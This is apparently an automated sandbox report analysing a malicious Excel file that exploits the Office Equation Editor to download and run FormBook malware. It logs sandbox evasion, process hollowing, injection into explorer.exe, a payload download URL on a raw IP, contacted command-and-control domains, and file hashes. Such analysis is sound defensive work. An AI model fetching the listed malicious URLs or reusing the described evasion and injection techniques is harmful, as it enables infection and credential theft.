      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB46C push eax; ret 8_2_000BB472
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B55A9 push ss; iretd 8_2_000B55AA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B99C4 push si; iretd 8_2_000B99C8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B9BB5 push ss; ret 8_2_000B9BB6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BCECD pushad ; retf 8_2_000BCECF
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57808526391
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: Form BA.xlsxStream path 'EncryptedPackage' entropy: 7.99876353791 (max. 8.0)

      Malware Analysis System Evasion:

      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A85E4 second address: 00000000000A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A897E second address: 00000000000A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004088B0 rdtsc 6_2_004088B0
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2992Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 1764Thread sleep time: -51703s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 2320Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 51703Jump to behavior
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000007.00000000.2194096339.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: vbc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.000
      Source: explorer.exe, 00000007.00000000.2208992815.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00409B20 LdrLoadDll,6_2_00409B20
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C500EA mov eax, dword ptr fs:[00000030h]6_2_00C500EA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C50080 mov ecx, dword ptr fs:[00000030h]6_2_00C50080
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C726F8 mov eax, dword ptr fs:[00000030h]6_2_00C726F8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F26F8 mov eax, dword ptr fs:[00000030h]8_2_024F26F8
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.pon.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 151.101.0.119 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.intoxickiss.com
      Injects a PE file into a foreign processes
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1388Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 20000Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 31 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Extra Window Memory Injection 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

      Behavior Graph

      Behavior Graph ID: 452641 | Sample: Form BA.xlsx | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100

      • Sample
        DNS/IP: www.800pls.info
        Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
        • EXCEL.EXE (started)
          Dropped: C:\Users\user\Desktop\~$Form BA.xlsx, data
        • EQNEDT32.EXE (started)
          DNS/IP: 3.121.113.175, 49165, 80 AMAZON-02US United States
          Dropped: C:\Users\user\AppData\Local\...\pool[1].exe, PE32
          Dropped: C:\Users\Public\vbc.exe, PE32
          Signatures: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          • vbc.exe (started)
            Signatures: Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            • vbc.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • rundll32.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                • cmd.exe (started)
              • explorer.exe (injected)
                DNS/IP: intoxickiss.com 151.101.0.119, 49167, 80 FASTLYUS United States; www.pon.xyz; 2 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Form BA.xlsx | 31% | Virustotal |
      Form BA.xlsx | 30% | ReversingLabs | Win32.Exploit.CVE-2017-11882

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe | 100% | Joe Sandbox ML |
      C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |

      Unpacked PE Files

      Source | Detection | Scanner | Label
      6.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      6.2.vbc.exe.8967b0.2.unpack | 100% | Avira | TR/ATRAPS.Gen
      6.3.vbc.exe.8967b0.0.unpack | 100% | Avira | TR/ATRAPS.Gen

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      71822.bodis.com | 199.59.242.153 | true | false | | high
      intoxickiss.com | 151.101.0.119 | true | true | | unknown
      www.800pls.info | unknown | unknown | true | | unknown
      www.pon.xyz | unknown | unknown | true | | unknown
      www.intoxickiss.com | unknown | unknown | true | | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      www.gaigoilaocai.com/wufn/ | true | Avira URL Cloud: safe | low

      URLs from Memory and Binaries

                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://search.ebay.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.nifty.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.google.si/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.google.cz/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.soso.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.univision.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs


                                                                                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | 71822.bodis.com | United States | 395082 | BODIS-NJUS | false
3.121.113.175 | unknown | United States | 16509 | AMAZON-02US | true
151.101.0.119 | intoxickiss.com | United States | 54113 | FASTLYUS | true

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452641
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:13:46
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 47s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Form BA.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@10/19@4/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 15.5% (good quality ratio 15%)
                                                                                                                                                  • Quality average: 75.9%
                                                                                                                                                  • Quality standard deviation: 26%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 74
                                                                                                                                                  • Number of non-executed functions: 63
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

Time | Type | Description
17:15:03 | API Interceptor | 40x Sleep call for process: EQNEDT32.EXE modified
17:15:04 | API Interceptor | 287x Sleep call for process: vbc.exe modified
17:15:54 | API Interceptor | 214x Sleep call for process: rundll32.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs


                                                                                                                                                  Domains


                                                                                                                                                  ASN


                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://3.121.113.175/www/pool.exe
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538D84B1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD4C46B.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
